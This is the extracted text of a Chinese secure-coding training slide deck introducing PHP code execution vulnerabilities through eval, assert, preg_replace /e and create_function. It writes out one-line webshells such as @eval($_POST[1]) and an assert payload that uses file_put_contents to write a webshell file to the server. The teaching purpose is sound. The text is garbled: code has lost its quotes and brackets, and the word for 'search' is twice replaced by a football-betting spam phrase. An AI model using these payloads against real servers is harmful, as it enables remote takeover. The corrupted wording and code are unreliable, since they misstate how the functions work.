《开发人员安全编码实战培训》课件——32-代码执行漏洞简介.pptxVIP

第32讲代码执行漏洞简介

引言应用程序中提供了一些可以将字符串作为代码执行的函数，比如PHP中的eval()函数，可以将函数中的参数当做PHP代码来执行如果这些函数的参数控制不严格，可能会被利用造成任意代码执行。

小测试代码执行有哪些方式？

学习目标能描述代码执行漏洞的形成原因能使用代码执行漏洞进行安全测试增加代码执行漏洞防范能力

什么是代码执行漏洞应用程序中提供了一些可以将字符串作为代码执行的函数，比如PHP中的eval()函数，可以将函数中的参数当做PHP代码来执行如果这些函数的参数控制不严格，可能会被利用造成任意代码执行。RCE为两种漏洞的缩写，分别为RemoteCommand/CodeExecute，远程命令/代码执行。命令注入与远程代码执行不同。他们的区别在于，远程代码执行实际上是调用服务器网站代码进行执行，而命令注入则是调用操作系统命令进行执行。虽然最终效果都会在目标机器执行操，但是他们还是有区别的，基于这个区别，我们如何找到并利用方式也是有所不同的。

代码执行的几种方式1、${}使用方法：${php代码}例如：?php${phpinfo()};?

代码执行的几种方式2、evaleval(string$code)—把字符串作为PHP代码执行。eval()函数示例代码：（1）?php@eval($_POST[1])?，常见的一句话木马，以此内容保存为p2.php，执行结果如下所示：

代码执行的几种方式（2）?php@eval($_REQUEST[cmd]);phpinfo();?，也是一句话木马。3、assertassert函数检查一个断言是否为FALSE，其用法如下：boolassert(mixed$assertion[,Throwable$exception])assert函数会检查指定的assertion并在结果为FALSE时采取适当的行动。如果assertion是字符串，它将会被assert()当做PHP代码来执行。assert()函数的示例代码：?php@assert($_POST[1])?

代码执行的几种方式利用assert写入一句话木马，将以上1=phpinfo();替换为：1=file_put_contents(2.php,?php@eval($_REQUEST[cmd]);phpinfo();?)再次运行，发现在服务器中写了一个p2.php的一句话木马文件，并可访问。

代码执行的几种方式4、preg_replacepreg_replace()函数执行一个正则表达式的有哪些信誉好的足球投注网站和替换，语法如下：mixedpreg_replace(mixed$pattern,mixed$replacement,mixed$subject[,int$limit=-1[,int$count]])作用：有哪些信誉好的足球投注网站subject中匹配pattern的部分，以replacement进行替换。例如：?php$subject=hellohack;$pattern=/hack/;$replacement=$_GET[name];$subject=preg_replace($pattern,$replacement,$subject);echo$subject;?

代码执行的几种方式在PHP5.5以前的版本中，preg_replace()函数存在模式修饰符，其中修饰符e会让preg_replace()函数将替换后的字符串作为PHP代码评估执行。?php$subject=hellohack;$pattern=/hack/e;$replacement=$_GET[name];$subject=preg_replace($pattern,$replacement,$subject);echo$subject;?

代码执行的几种方式在PHP7中，该实验结果如下，不再支持/e：

代码执行的几种方式5、create_function()create_function()函数根据传入的参数创建匿名函数，并为该匿名函数返回唯一名称，其用法如下：stringcreate_function(string$args，string$code)例如：$a=create_function($id,echo$id;);定义一个匿名函数$a，他的形参是“$id”，函数的内容就是打印出传递的实参。如：echo$a(8); 运行就会打印输出“8”。示例：?php$id=$_GET[id];$code=echo.$func.hello.$id.;;